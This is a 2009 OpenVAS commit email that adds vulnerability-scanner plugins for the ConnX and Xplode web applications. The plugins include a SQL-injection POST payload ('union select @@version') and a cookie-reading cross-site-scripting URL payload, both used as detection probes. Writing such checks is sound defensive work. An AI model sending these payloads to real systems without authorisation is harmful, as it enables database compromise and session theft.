[Openvas-commits] r3064 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Apr 8 20:52:56 CEST 2009
Author: mime
Date: 2009-04-08 20:52:50 +0200 (Wed, 08 Apr 2009)
New Revision: 3064
Added:
trunk/openvas-plugins/scripts/ConnX_34388.nasl
trunk/openvas-plugins/scripts/ConnX_detect.nasl
trunk/openvas-plugins/scripts/Xplode_34419.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-04-08 16:12:41 UTC (rev 3063)
+++ trunk/openvas-plugins/ChangeLog 2009-04-08 18:52:50 UTC (rev 3064)
@@ -1,3 +1,9 @@
+2009-04-08 Michael Meyer <mime at gmx.de>
+ * scripts/Xplode_34419.nasl,
+ scripts/ConnX_34388.nasl,
+ scripts/ConnX_detect.nasl:
+ Added new plugins
+
2009-04-08 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>
* scripts/gather-package-list.nasl, scripts/unknown_services.nasl,
Added: trunk/openvas-plugins/scripts/ConnX_34388.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ConnX_34388.nasl 2009-04-08 16:12:41 UTC (rev 3063)
+++ trunk/openvas-plugins/scripts/ConnX_34388.nasl 2009-04-08 18:52:50 UTC (rev 3064)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
+#
+# Authors
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100115);
+ script_bugtraq_id(34370);
+ script_version ("1.0");
+
+ script_name(english:"ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ ConnX is prone to an unspecified SQL-injection vulnerability because
+ it fails to sufficiently sanitize user-supplied data before using it
+ in an SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ ConnX 4.0.20080606 is vulnerable; other versions may also be
+ affected.
+
+ See also:
+ http://www.securityfocus.com/bid/
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if ConnX is vulnerable to SQL Injection");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("ConnX_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_asp(port:port))exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/connx")))exit(0);
+if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
+
+dir = matches[2];
+
+ if(!isnull(dir)) {
+
+ variables=string("__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24hfLoad=&ctl00%24txtFilter=&ctl00%24txtHelpFile=&ctl00%24txtReportsButtonOffset=70&ctl00%24cphMainContent%24txtEmail=++'+union+select+%40%40version%3B--&ctl00%24cphMainContent%24cbSubmit=Submit&ctl00%24txtCurrentFavAdd=&ctl00%24hfFavsTrigger=");
+ filename = string(dir + "/frmLoginPwdReminderPopup.aspx");
+ host=get_host_name();
+
+ req = string(
+ "POST ", filename, " HTTP/1.0\r\n",
+ "Referer: ","http://", host, filename, "\r\n",
+ "Host: ", host, ":", port, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(variables),
+ "\r\n\r\n",
+ variables
+ );
+
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )exit(0);
+
+ if(egrep(pattern:"Syntax error converting the nvarchar value", string: buf,icase:TRUE))
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+ }
+
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/ConnX_34388.nasl
___________________________________________________________________
Name: svn:keywords
+ ID
Added: trunk/openvas-plugins/scripts/ConnX_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ConnX_detect.nasl 2009-04-08 16:12:41 UTC (rev 3063)
+++ trunk/openvas-plugins/scripts/ConnX_detect.nasl 2009-04-08 18:52:50 UTC (rev 3064)
@@ -0,0 +1,111 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ConnX Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc["english"] = "
+
+ Overview:
+ This host is running ConnX.
+
+ See also:
+ http://www.q2solutions.com.au
+
+ Risk factor : None";
+
+if (description)
+{
+ script_id(100114);
+ script_version ("1.0");
+
+ script_name(english:"ConnX Detection");
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Checks for the presence of ConnX");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_asp(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "Login to ConnX", string: buf, icase: TRUE) && egrep(pattern: "Q2 Solutions", string: buf, icase: TRUE))
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ vers = string("unknown");
+
+ ### try to get version
+ version = eregmatch(string: buf, pattern: "Version ([0-9.]+ [^<]*)",icase:TRUE);
+
+ if ( !isnull(version[1]) ) {
+ vers=chomp(version[1]);
+ }
+
+ set_kb_item(name: string("www/", port, "/connx"), value: string(vers," under ",install));
+
+ info = string("None\n\nConnX Version '");
+ info += string(vers);
+ info += string("' was detected on the remote host in the following directory(s):\n\n");
+ info += string(install, "\n");
+
+ desc = ereg_replace(
+ string:desc["english"],
+ pattern:"None$",
+ replace:info
+ );
+
+ if(report_verbosity > 0) {
+ security_note(port:port,data:desc);
+ }
+ exit(0);
+
+ }
+}
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/ConnX_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ ID
Added: trunk/openvas-plugins/scripts/Xplode_34419.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Xplode_34419.nasl 2009-04-08 16:12:41 UTC (rev 3063)
+++ trunk/openvas-plugins/scripts/Xplode_34419.nasl 2009-04-08 18:52:50 UTC (rev 3064)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting
+# Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100113);
+ script_bugtraq_id(34419);
+ script_version ("1.0");
+
+ script_name(english:"Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting Vulnerabilities
+ ");
+ desc["english"] = "
+
+ Overview:
+ Xplode is prone to an SQL-injection vulnerability and a cross-site
+ scripting vulnerability because it fails to sufficiently sanitize
+ user-supplied data.
+
+ Exploiting these issues could allow an attacker to steal
+ cookie-based authentication credentials, compromise the application,
+ access or modify data, or exploit latent vulnerabilities in the
+ underlying database.
+
+ See also:
+ http://www.securityfocus.com/bid/34419
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Xplode is prone to XSS and SQL-injection vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_asp(port:port)) exit(0);
+
+dir = make_list("/cms", cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, '/module_wrapper.asp?wrap_script=modules/Search+results/search.asp&SearchType=all&SearchString=">><script>alert(document.cookie)</script>');
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+ if( buf == NULL )continue;
+
+ if (egrep(pattern:"<script>alert\(document\.cookie\)</script>", string: buf) )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/Xplode_34419.nasl
___________________________________________________________________
Name: svn:keywords
+ ID
More information about the Openvas-commits
mailing list